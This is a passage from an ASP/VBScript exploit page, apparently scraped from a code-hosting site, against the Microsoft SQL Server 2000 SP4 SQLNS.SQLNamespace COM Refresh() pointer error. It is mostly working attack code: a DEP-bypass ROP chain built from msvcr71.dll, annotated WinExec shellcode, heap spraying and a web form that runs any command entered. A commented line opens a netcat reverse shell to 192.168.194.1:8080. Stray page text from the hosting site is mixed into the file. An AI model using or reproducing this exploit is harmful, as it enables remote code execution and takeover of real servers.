arrTmp = Split(strCode, "\x")
|
||||
For I = 1 To UBound(arrTmp) Step 2
|
||||
PackShellcode = PackShellcode & UnEscape("%u" & arrTmp(I + 1) & arrTmp(I))
|
||||
Next
|
||||
End Function
|
||||
|
||||
Function UnicodeToAscii(uStrIn)
|
||||
intLen = Len(strCommand)
|
||||
If intLen Mod 2 = 1 Then
|
||||
For I = 1 To intLen - 1 Step 2
|
||||
UnicodeToAscii = UnicodeToAscii & "%u" & Hex(Asc(Mid(strCommand, I + 1, 1))) & Hex(Asc(Mid(strCommand, I, 1)))
|
||||
Next
|
||||
UnicodeToAscii = UnicodeToAscii & "%u00" & Hex(Asc(Mid(strCommand, I, 1)))
|
||||
Else
|
||||
For I = 1 To intLen - 1 Step 2
|
||||
UnicodeToAscii = UnicodeToAscii & "%u" & Hex(Asc(Mid(strCommand, I + 1, 1))) & Hex(Asc(Mid(strCommand, I, 1)))
|
||||
Next
|
||||
End If
|
||||
UnicodeToAscii = UnEscape(UnicodeToAscii & "%u0000%u0000")
|
||||
End Function
|
||||
|
||||
'''''''''''''''''''''''''''''bypass DEP with [msvcr71.dll] 92 bytes
|
||||
Rop_Chain = Array(_
|
||||
"0x41414141", _
|
||||
"0x7c373ab6", _
|
||||
"0x7c3425bc", _
|
||||
"0x7c376fc5", _
|
||||
"0x7c343423", _
|
||||
"0x7c3415a2", _
|
||||
"0x7c373ab6", _
|
||||
"0x41414141", _
|
||||
"0x41414141", _
|
||||
"0x41414141", _
|
||||
"0x41414141", _
|
||||
"0x7c344dbe", _
|
||||
"0x7c376fc5", _
|
||||
"0x7c373ab6", _
|
||||
"0x7c373ab6", _
|
||||
"0x7c351cc5", _
|
||||
"0x7c3912a3", _
|
||||
"0x7c3427e5", _
|
||||
"0x7c346c0b", _
|
||||
"0x7c3590be", _
|
||||
"0x7c37a151", _
|
||||
"0x7c378c81", _
|
||||
"0x7c345c30" _
|
||||
)
|
||||
Small_Shellcode = "\x64\x8B\x25\x00\x00\x00\x00\xeb\x07\x90\x90\x90"
|
||||
'0C0C0C6C 64:8B25 00000000 MOV ESP,DWORD PTR FS:[0]
|
||||
'0C0C0C73 EB 07 JMP SHORT 0C0C0C7C
|
||||
'0C0C0C75 90 NOP
|
||||
'0C0C0C76 90 NOP
|
||||
'0C0C0C77 90 NOP
|
||||
'12 bytes
|
||||
Fix_ESP = "\x83\xEC\x24\x8B\xEC\x83\xC5\x30"
|
||||
'0C0C0C7C 83EC 24 SUB ESP,24
|
||||
'0C0C0C7F 8BEC MOV EBP,ESP
|
||||
'0C0C0C81 83C5 30 ADD EBP,30
|
||||
'8 bytes
|
||||
'''''''''''''''''''''''''''''shellcode WinExec (win2k sp2)
|
||||
Real_Shellcode = "\xd9\xee\x9b\xd9\x74\x24\xf4\x5e\x83\xc6\x1a\x33\xc0\x50\x56\x68\x41\x41\x41\x41\x68\x16\x41\x86\x7c\xc3"
|
||||
'D9EE FLDZ
|
||||
'9B WAIT
|
||||
'D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C]
|
||||
'5E POP ESI
|
||||
'83C6 1a ADD ESI,1a
|
||||
'33C0 XOR EAX,EAX
|
||||
'50 PUSH EAX
|
||||
'56 PUSH ESI
|
||||
'68 F1F8807C PUSH kernel32.ExitThread
|
||||
'68 1641867C PUSH kernel32.WinExec
|
||||
'C3 RETN
|
||||
'''''''''''''''''''''''''''''main
|
||||
Dim strCmd
|
||||
|
||||
strCmd = Request("cmd")
|
||||
strCommand = "cmd.exe /q /c " & strCmd
|
||||
'strCommand = "C:\Inetpub\wwwroot\nc.exe -e cmd.exe 192.168.194.1 8080"
|
||||
|
||||
strOpcode = PackShellcode(Real_Shellcode) & UnicodeToAscii(strCommand)
|
||||
intOpcode = Len(strOpcode)
|
||||
|
||||
Payload = String((1000/2), UnEscape("%u4141")) & PackDWORD("0x0c0c0c0c") & PackList(Rop_Chain) & PackShellcode(Small_Shellcode) & PackDWORD("0x5a64f0fe") &_
|
||||
PackShellcode(Fix_ESP) & strOpcode &_
|
||||
Padding(928 - intOpcode*2)
|
||||
'Response.Write Len(Payload)
|
||||
Dim Block
|
||||
For N = 1 to 512
|
||||
Block = Block & Payload
|
||||
Next
|
||||
Dim spary()
|
||||
For I = 0 To 200 Step 1
|
||||
Redim Preserve spary(I)
|
||||
spary(I) = Block
|
||||
Next
|
||||
|
||||
If strCmd = "" Then
|
||||
Response.Write "Please Input command! <br />"
|
||||
Else
|
||||
Set obj = CreateObject("SQLNS.SQLNamespace")
|
||||
Response.Write "Try to Execute: " & strCommand
|
||||
arg1 = 202116108 '0x0c0c0c0c
|
||||
obj.Refresh arg1
|
||||
End If
|
||||
%>
|
||||
<html><head><title>Microsoft SQL Server 2000 SP4 SQLNS.SQLNamespace COM object Refresh() Pointer Error Exploit(DEP bypass)</title>
|
||||
<body>
|
||||
<p>
|
||||
Microsoft SQL Server 2000 SP4 SQLNS.SQLNamespace COM object Refresh() Pointer Error Exploit(DEP bypass) <br />
|
||||
Other version not test :) <br />
|
||||
Bug found and Exploit by ylbhz@hotmail.com At 2012/04/03<br />
|
||||
</P>
|
||||
|
||||
<form action="" method="post">
|
||||
Program to Execute:<input type="text" value="<%=strCmd%>"size=120 name="cmd"></input><input type="submit" value="Exploit">
|
||||
</form>
|
||||
</form>
|
Loading…
Add table
Reference in a new issue